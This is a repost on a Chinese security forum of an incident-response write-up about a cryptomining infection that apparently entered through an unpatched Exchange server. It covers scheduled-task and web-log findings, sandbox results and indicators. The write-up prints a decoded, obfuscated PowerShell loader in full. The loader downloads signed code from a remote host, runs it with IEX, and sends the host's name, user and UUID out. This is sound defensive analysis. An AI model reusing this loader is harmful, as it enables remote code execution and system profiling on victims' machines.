安全矩阵

 找回密码
 立即注册
搜索
查看: 2788|回复: 0

应急实战 | 记一次日志缺失的挖矿排查

[复制链接]

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-9-10 07:54:20 | 显示全部楼层 |阅读模式
应急实战 | 记一次日志缺失的挖矿排查 (qq.com)
应急实战 | 记一次日志缺失的挖矿排查原创 沉默树人 潇湘信安 1周前
收录于话题
#实战案例,49
#应急响应,5
                        声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
                        请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
                       

感谢群友@沉默树人老哥的投稿,感谢分享

。这篇文章详细记录了他在一次应急实战中对于日志缺失时对挖矿程序排查的过程,希望大家能够从中有所收获。



午后梦中惊坐起,电话一来要应急。那是我下了夜班在睡觉,然后来电话了,又要整应急了。急匆匆开电脑,打开手机看了一眼微信,两个现场的同事发在群里的图了。是日志。

           
  •         “你那边什么情况,有点像哈希传递。”

           
  •         “被挖矿了,但是这边的运维重装过主机。”

           
  •         “我去,截下来样本没,排查完了吗?”

           
  •         “一部分日志和样本截留下来了,但是还没排查完,帮忙看看怎么进来。”


PS:以下数据已经脱敏,聊天记录不会截图,只分享经验和思路,这是一次条件极为有限的排查。

0x01 确认到手情报
首先来看一下,同事手上有啥情报。

           
  •         1.在被感染主机上发现计划任务。

           
  •         2.拉取了主机上web日志,发现存在哈希传递。

           
  •         3.powershell下提取到了攻击样本。

           
  •         4.感染了10台左右主机,已经重装系统。

           
  •         5.暂时认定邮件系统为打击入口。


好吧,其实问题不大。【都被清光了】,我过去只是大概还原一下攻击过程、清理痕迹和写报告。

0x02 分析攻击行为
康康到底是咋回事,接下来一条一条情报来分析。
天融信的设备发出的告警如下:


一、确认打击点、利用点
1.常规排查
网络外连情况:无特殊情况。


开机启动项情况:没有自动项


最近启动程序情况:没有乱码程序启动


windows安全日志情况:
无新增用户、没有日志都是登陆,注销日志没有异常


2.计划任务排查:


计划任务名称:backball、backball1
启动路径结合下面的web日志可以看出是powershell下的一个乱码程序
触发器:在首次触发后,无限期地每隔02:00:00重复一次。

3.web日志


在web日志中,可以看见大量的POST请求,访问的是exchage邮件服务器。并且通过mailbox字段可以知道,已经泄露出了一个邮箱,攻击者应该就是从这里进来的。

二、还原攻击过程


三、攻击样本分析
1.先看沙箱分析



沙箱中已经存在这种恶意文件,也就是说之前有人提交过。
(1)发现一个外连地址 1.117.58.154,被标红了。
(2)该恶意文件可以检查宿主机的内存和网络接口,以此反虚拟机。
(3)开启端口并监听,获取系统时间。

2.powershell分析其实只分析那个Powershell就够了,ps1文件解码出来太大了,如果需要请私信我。

解码后的ps1文件:

           

powershell -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.jus'+'anrihua.com';a($url+'/a.jsp?rep_20210713?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

大概就是:从这里能看出来大部分东西了,生成的exe也是能被杀的,分析也没啥意义


0x03 总结
通过分析得出,因为该服务器的exchange版本过低且没有进行补丁更新。被攻击者成功利用最近的exchange漏洞攻入,并利用计划任务的方法达到定时启动恶意挖矿程序和不死属性驻留主机。

通过特征可以溯源出是cs的powershell马,然后将其解码可以知道它的行为。



因为缺乏全流量设备的支撑,无法获取dns解析记录、相关IPS日志等监控记录,部分Windows日志也被重装丢失掉,只能到此为止。

相关链接:
  1. //国外相关分析
  2. https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html
  3. //github记录木马表格
  4. https://github.com/sophoslabs/IoCs/blob/master/Trojan-LDMiner.csv
  5. //沙箱分析记录
  6. https://s.threatbook.cn/report/file/fae6a3a4e5b11cdc8a982798167de4c1aafd101cc8726ba520c420d1ef381a9d/?env=win7_sp1_enx64_office2013
  7. //powershell混淆解码
  8. https://www.freebuf.com/articles/system/181697.html
  9. //解码ps1
  10. https://www.powershellgallery.com/packages/PowerSploit/3.0.0.0/Content/CodeExecution%5CInvoke-ReflectivePEInjection.ps1
复制代码



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 15:50 , Processed in 0.014876 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表